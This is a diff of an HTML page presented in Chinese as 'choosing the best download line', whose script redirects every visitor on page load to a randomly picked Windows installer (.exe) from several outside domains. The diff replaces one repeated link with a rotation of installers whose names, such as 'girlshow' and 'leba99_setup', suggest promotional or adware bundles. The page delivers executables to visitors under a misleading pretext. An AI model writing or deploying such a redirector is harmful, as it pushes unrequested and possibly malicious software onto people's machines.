--- a/index.html
+++ b/index.html
@@ -4,12 +4,12 @@
 <title>已为你选择最佳下载线路...</title>
 <script>
 function a(){
-var arr=["http://down2.videospeedy.com/5126setup_32_13765.exe ",
- "http://down2.videospeedy.com/5126setup_32_13765.exe",
- "http://down2.videospeedy.com/5126setup_32_13765.exe", 
- "http://down2.videospeedy.com/5126setup_32_13765.exe",
- "http://down2.videospeedy.com/5126setup_32_13765.exe", 
- "http://down2.videospeedy.com/5126setup_32_13765.exe", 
+var arr=["http://download.re58.cn/down/girlshow_22091730138.exe",
+ "http://down2.videospeedy.com/5126setup_32_30138.exe",
+ "http://xd.shzhuhua.com.cn:9092/tg1/leba99_setup_110030138.exe", 
+ "http://download.re58.cn/down/girlshow_22091730138.exe",
+ "http://down2.videospeedy.com/5126setup_32_30138.exe", 
+ "http://xd.shzhuhua.com.cn:9092/tg1/leba99_setup_110030138.exe", 
 ];
 var n=parseInt(Math.random()*6);
 window.location.href=arr[n];
